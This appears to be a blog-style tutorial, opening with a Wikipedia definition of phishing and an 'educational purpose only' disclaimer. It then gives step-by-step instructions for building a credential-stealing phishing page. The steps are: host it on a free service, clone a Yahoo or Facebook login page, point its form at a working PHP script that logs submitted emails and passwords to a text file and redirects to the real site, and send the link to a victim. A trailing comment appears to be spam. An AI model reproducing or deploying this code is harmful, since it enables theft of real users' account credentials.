FILE INFORMATION
|
.
This Tutorial is "STRICTLY" for "EDUCATIONAL" purpose only. Don't Misuse It. Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware. Phishing is typically carried out by e-mail spoofing or instant messaging and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.
Source: Wikipedia
.
In the field of computer security, phishing is the
criminally fraudulent process of attempting to acquire sensitive
information such as usernames, passwords and credit card details by
masquerading as a trustworthy entity in an electronic communication.
Communications purporting to be from popular social web sites, auction
sites, online payment processors or IT Administrators are commonly used
to lure the unsuspecting. Phishing is typically carried out by e-mail or
instant messaging, and it often directs users to enter details at a
fake website whose look and feel are almost identical to the legitimate
one. Even when using server authentication, it may require tremendous
skill to detect that the website is fake.
Read more for the Phishing Tutorial
|
How to Setup Phishing
|
Step 1- Firstly you must signup for a free web hosting service like:
www.freehostia.com
www.ripway.com etc….. and register a domain or subdomain.
After getting your signup done, you have your own subdomain like for
instance you registered with freehostia, then your domain is like
“www.yourname.freehostia.com”
Step 2- Now Login to your freehostia account and go to “File Manager” in the freehostia control panel.
Step 3- Now what you have to do is, go to your
domain folder like “yourname.freehostia.com” and create a separate
folder in that directory with the name of the site, for eg. yahoo,
if you want to phish a yahoomail account!
Step 4- Copy The Codes. Write in notepad and save it with end of "yourname.php"
<html>
<body> <?php $handle = fopen("password.txt", "a");
fwrite($handle,$_POST["email"]); fwrite($handle,"\n");
fwrite($handle,$_POST["pass"]); fwrite($handle,"\n");
fwrite($handle,"\n"); fclose($handle); header("Location:
https://www.facebook.com/login.php?login_attempt=1"); exit; ?>
</body></html>
Step 4.5- Go to your website whose you want to phish and right click on home page and select "view page source". Copy The Codes. Write in notepad. press Ctl+F and find:
action="https://www.facebook.com/login.php?login_attempt=1" (FOR Facebook) action="https://login.yahoo.com/config/login?" (FOR Yahoo!) action="https://????????????" (FOR Others)
Replace the red background line with php you created "yourname.php".
save it with end of "yourname.html"
Step 4.9- Create a blank "password.txt" file.
Step 5- Now upload “yourname.php” & “yourname.html” & "password.txt" to the yahoo folder you created inside “yourname.freehostia.com”
So
when you’re done with the uploading part, the link to your yahoo
phisher is “www.yourname.freehostia.com/yahoo/yourname.html”.
Step 6- Congrats!! That is your phisher!!
Now all you have to do is copy the link to the phisher file
i.e.”www.yourname.freehostia.com/yahoo/index.htm” and send it to the
victim you want to hack! When he/she’ll open that link, it’ll be
directed to your yahoo phisher and when he/she logins that page
he/she’ll be redirected to the original “YahooMail” website and you’ll
get the password in the “password.txt” file which will be created in tha
yahoo folder you created in your freehostia domain and the path to
that file will be “www.yourname.freehostia.com/yahoo/password.txt” !
IMPORTANT NOTE: CHANGE YOUR FREEHOSTIA DIRECTORY PERMISSION TO “755” SO THAT NO ONE CAN ACCESS YOUR PERSONAL FILES EXCEPT THE PHISHER LOGIN PAGE!! |
+ comments + 1 comments
I have been using AVG protection for a number of years, I'd recommend this solution to everyone.
Post a Comment